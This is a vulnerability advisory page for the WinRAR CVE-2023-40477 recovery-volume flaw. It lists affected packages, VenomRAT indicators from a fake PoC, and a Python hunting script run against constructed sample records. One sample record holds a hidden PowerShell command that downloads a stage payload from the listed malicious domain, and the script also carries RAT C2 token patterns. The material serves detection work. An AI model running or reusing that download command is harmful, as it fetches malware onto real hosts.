CVE-2023-40477
published 2024-05-03

CVE-2023-40477: RARLAB WinRAR Recovery Volume Improper Validation of Array Index Remote Code Execution Vulnerability

Priority: P3 51, high
CVSS 3.0 base score: 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
EPSS: 13.08% (95.9th percentile)
RARLAB WinRAR Recovery Volume Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of RARLAB WinRAR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of recovery volumes. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21233.

Affected

11 ranges
Vendor   Product         Version range                                 Fixed in
debian   libclamunrar    < libclamunrar 1.0.3-1~deb12u1 (bookworm)     libclamunrar 1.0.3-1~deb12u1 (bookworm)
debian   rar             < libclamunrar 1.0.3-1~deb12u1 (bookworm)     libclamunrar 1.0.3-1~deb12u1 (bookworm)
debian   unrar-nonfree   < libclamunrar 1.0.3-1~deb12u1 (bookworm)     libclamunrar 1.0.3-1~deb12u1 (bookworm)
rarlab   rar             >= 0, < 2:6.23-1~deb11u1                      2:6.23-1~deb11u1
rarlab   rar             >= 0, < 2:6.23-1~deb12u1                      2:6.23-1~deb12u1
rarlab   rar             >= 0, < 2:6.23-1                              2:6.23-1
rarlab   rar             >= 0, < 2:6.23-1                              2:6.23-1
rarlab   rar             >= 0, < 2:6.23-1~20.04.1                      2:6.23-1~20.04.1
rarlab   rar             >= 0, < 2:6.23-1~22.04.1                      2:6.23-1~22.04.1
rarlab   winrar          < 6.23                                        6.23
rarlab   winrar          (no range given)                              (none given)

Detection & IOCs (extracted from sources)

domain    checkblacklistwords[.]eu
url       checkblacklistwords[.]eu/c.txt
url       checkblacklistwords[.]eu/words.txt
url       http://checkblacklistwords[.]eu/list.txt
path      %TEMP%/bat.bat
path      %TEMP%\c.ps1
path      %APPDATA%\Drivers\Windows.Gaming.Preview.exe
filename  Windows.Gaming.Preview.exe
filename  poc.py
filename  CVE-2023-40477-main.zip
mutex     fqziwqjwgwzscvfy
other     Windows.Gaming.Preview (scheduled task, runs every 3 minutes)
hash      82cb695f463b93b9cc089253cd6b5e32dce46c35 (SHA-1)
  • Hunt for a scheduled task named 'Windows.Gaming.Preview' executing %APPDATA%\Drivers\Windows.Gaming.Preview.exe every 3 minutes — this is the VenomRAT persistence mechanism.
  • VenomRAT C2 beacon identification: look for the mutex value 'fqziwqjwgwzscvfy' in process memory or handle listings on infected hosts.
  • Monitor for PowerShell downloading from checkblacklistwords[.]eu/c.txt and checkblacklistwords[.]eu/words.txt as second- and third-stage payload retrieval steps.
  • VenomRAT keylogger writes keystrokes to a locally stored text file under %APPDATA%; look for unexpected .txt files in that directory alongside the Windows.Gaming.Preview.exe binary.
  • Detect VenomRAT C2 commands in network traffic: strings 'plu_gin', 'HVNCStop', 'loadofflinelog', 'save_Plugin', 'runningapp', 'keylogsetting', 'init_reg', 'Po_ng', 'filterinfo' are distinctive RAT command tokens.
  • CVE-2023-40477 is triggered by opening a specially crafted RAR recovery volume; detection should focus on WinRAR processing .rev (recovery volume) files from untrusted sources, particularly versions prior to 6.23.
  • The fake PoC GitHub repository (whalersplonk) and the Streamable demonstration video are no longer available; the infection chain URLs on checkblacklistwords[.]eu may also be inactive, but the domain should still be blocked.
  • The poc.py script terminates with an exception before it completes, but the code that downloads and runs the malicious payload executes before the crash. A script that visibly failed is therefore not evidence that no infection occurred.
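The hunting guidance above, turned into runnable checks as an added example (this is not code from the page or from any vendor). The script applies the page's indicators to constructed sample records: the 3-minute Windows.Gaming.Preview task and its %APPDATA%\Drivers binary, the fqziwqjwgwzscvfy mutex and payload hash, PowerShell fetches from checkblacklistwords[.]eu, VenomRAT C2 tokens inside captured traffic, and a pre-6.23 WinRAR processing a .rev recovery volume. The record field names and every sample record are assumptions made for this demonstration, not real telemetry or any product's schema.

```python
"""Hunt logic for the CVE-2023-40477 fake-PoC / VenomRAT chain.

Added example, not code from the original page or from any vendor. The
indicators (domain, stage URLs, task name, binary path, mutex, C2 tokens,
payload hash, fixed WinRAR version) are copied from the page above; every
record in SAMPLE is constructed for this demonstration and is not real
telemetry. The record schema (kind, name, action, interval_minutes, cmdline,
mutex, sha1, image, file, version, data) is an assumption of this example.
"""

C2_DOMAIN = "checkblacklistwords[.]eu"          # defanged, as listed on the page
STAGE_PATHS = ("/c.txt", "/words.txt", "/list.txt")
TASK_NAME = "Windows.Gaming.Preview"
TASK_BINARY = r"%APPDATA%\Drivers\Windows.Gaming.Preview.exe"
MUTEX = "fqziwqjwgwzscvfy"
C2_TOKENS = ("plu_gin", "HVNCStop", "loadofflinelog", "save_Plugin", "runningapp",
             "keylogsetting", "init_reg", "Po_ng", "filterinfo")
PAYLOAD_SHA1 = "82cb695f463b93b9cc089253cd6b5e32dce46c35"
WINRAR_FIXED = (6, 23)


def refang(ioc):
    """Turn the page's defanged form (host[.]tld) back into a matchable hostname."""
    return ioc.replace("[.]", ".")


def winrar_vulnerable(version):
    """True when a WinRAR version string is older than the 6.23 fix.
    An unknown version is treated as unpatched so the event is not silently dropped."""
    if not version:
        return True
    parts = [int(x) for x in version.split(".")[:2]] + [0]
    return tuple(parts[:2]) < WINRAR_FIXED


def check_task(rec):
    """Persistence: task name, binary under %APPDATA%\\Drivers, 3-minute repeat."""
    hits = []
    if rec.get("name") == TASK_NAME:
        hits.append("scheduled task named Windows.Gaming.Preview")
    if rec.get("action", "").lower() == TASK_BINARY.lower():
        hits.append("task action is the VenomRAT binary path")
    if rec.get("interval_minutes") == 3:
        hits.append("repeats every 3 minutes")
    return hits


def check_process(rec):
    """Stage download by PowerShell, the RAT mutex, or the known payload hash."""
    hits = []
    cmd = rec.get("cmdline", "").lower()
    host = refang(C2_DOMAIN)
    if "powershell" in cmd and host in cmd:
        stages = [p for p in STAGE_PATHS if host + p in cmd]
        hits.append("PowerShell fetch from %s %s" % (C2_DOMAIN, stages))
    if rec.get("mutex") == MUTEX:
        hits.append("VenomRAT mutex present")
    if rec.get("sha1", "").lower() == PAYLOAD_SHA1:
        hits.append("known payload SHA-1")
    return hits


def check_winrar(rec):
    """Pre-6.23 WinRAR processing a .rev recovery volume (the CVE trigger)."""
    if (rec.get("image", "").lower().endswith("winrar.exe")
            and rec.get("file", "").lower().endswith(".rev")
            and winrar_vulnerable(rec.get("version"))):
        return ["vulnerable WinRAR processing a recovery volume: " + rec["file"]]
    return []


def check_network(rec):
    """Distinctive VenomRAT C2 command tokens inside a captured payload."""
    data = rec.get("data", b"")
    found = [t for t in C2_TOKENS if t.encode() in data]
    return ["VenomRAT C2 tokens: %s" % found] if found else []


CHECKS = {"task": check_task, "process": check_process,
          "winrar": check_winrar, "network": check_network}


def triage(records):
    """Map record index -> findings for every record matching at least one IOC."""
    findings = {}
    for i, rec in enumerate(records):
        hits = CHECKS.get(rec.get("kind"), lambda r: [])(rec)
        if hits:
            findings[i] = hits
    return findings


# Constructed sample telemetry (not real): benign and suspicious records per check.
SAMPLE = [
    {"kind": "task", "name": "OneDrive Standalone Update Task",
     "action": r"%LOCALAPPDATA%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe",
     "interval_minutes": 1440},
    {"kind": "task", "name": TASK_NAME, "action": TASK_BINARY, "interval_minutes": 3},
    {"kind": "process", "cmdline": "powershell.exe -nop -w hidden -c \"iwr "
     "http://checkblacklistwords.eu/c.txt -OutFile %TEMP%\\c.ps1\""},
    {"kind": "process", "cmdline": TASK_BINARY, "mutex": MUTEX, "sha1": PAYLOAD_SHA1},
    {"kind": "winrar", "image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "file": r"C:\Users\u\Downloads\CVE-2023-40477-main.part1.rev", "version": "6.22"},
    {"kind": "winrar", "image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "file": r"C:\Users\u\Downloads\backup.rev", "version": "6.23"},
    {"kind": "network", "data": b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"},
    {"kind": "network", "data": b"\x00\x12keylogsetting|true\x00\x05Po_ng"},
]

if __name__ == "__main__":
    for idx, hits in sorted(triage(SAMPLE).items()):
        print(idx, hits)
```

Run stand-alone it prints the five suspicious records (indices 1, 2, 3, 4 and 7) with their reasons; the benign task, the patched WinRAR event and the ordinary HTTP request produce nothing. The version check treats a missing version as vulnerable on purpose, so an event from a host whose WinRAR build is unknown still surfaces for manual review.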

CVSS provenance

nvd            v3.0   7.8 HIGH   CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
osv                   7.8 HIGH
vendor_debian         7.8 HIGH
vendor_ubuntu         7.5 HIGH